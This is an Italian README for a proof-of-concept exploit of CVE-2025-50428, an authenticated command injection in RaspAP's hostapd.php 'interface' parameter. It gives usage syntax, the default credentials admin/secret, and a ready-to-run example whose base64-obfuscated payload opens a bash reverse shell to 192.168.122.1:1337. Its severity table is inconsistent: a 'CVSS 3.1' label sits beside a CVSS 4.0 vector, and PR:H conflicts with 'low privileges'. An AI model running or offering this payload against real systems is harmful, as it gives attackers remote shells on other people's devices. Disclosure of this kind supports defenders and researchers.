
Prova di concetto per la vulnerabilità CVE-2025-50428: Iniezione autenticata di comandi di sistema in RaspAP
Un proof-of-concept exploit per CVE-2025-50428, una vulnerabilità di iniezione di comandi in RaspAP raspap-webgui 3.2.9 e versioni precedenti.
| ID Vulnerabilità | CVE-2025-50428 |
|---|---|
| Gravità | Alta (CVSS 3.1: 8.6) |
| Vettore CVSS | CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N |
| Tipo di Vulnerabilità | Iniezione di Codice |
| Vettore di Attacco | Remoto (Autenticato) |
| Privilegi Richiesti | Bassi |
| Impatto | Esecuzione di Codice, Escalation dei Privilegi |
| Prodotto Interessato | raspap-webgui ≤ 3.2.9 |
| Scoperta da | SmartTECS Cyber Security GmbH |
Questo exploit prende di mira una vulnerabilità di iniezione di comandi nello script hostapd.php di RaspAP. La vulnerabilità è dovuta a una sanitizzazione impropria dell'input utente passato tramite il parametro interface. Un utente malintenzionato autenticato può iniettare comandi OS arbitrari, ottenendo l'esecuzione di codice con i privilegi dell'utente www-data.
requests installatapython3 poc.py --base-url <url> --interface <payload> [--username <username>] [--password <password>]
--base-url: URL di base dell'installazione di RaspAP (es., http://192.168.122.22)--interface: Valore per il parametro interface, è consentito un payload di iniezione--username: Nome utente RaspAP (predefinito: admin)--password: Password RaspAP (predefinita: secret)python3 poc.py --base-url http://192.168.122.22 --interface "';echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyMi4xLzEzMzcgMD4mMTs= | base64 -d | bash"
SmartTECS Cyber Security GmbH è un'azienda di cybersecurity specializzata in penetration testing, sviluppo software sicuro e ricerca sulle vulnerabilità. L'azienda fornisce valutazioni della sicurezza su misura, servizi di incident response e consulenza strategica per aiutare le organizzazioni a proteggere i sistemi critici dalle minacce informatiche in evoluzione.
Questo strumento è fornito esclusivamente a scopo educativo e di ricerca. Utilizzarlo solo su sistemi di propria proprietà o amministrati con esplicita autorizzazione. L'autore e SmartTECS Cyber Security GmbH declinano ogni responsabilità per usi impropri o danni.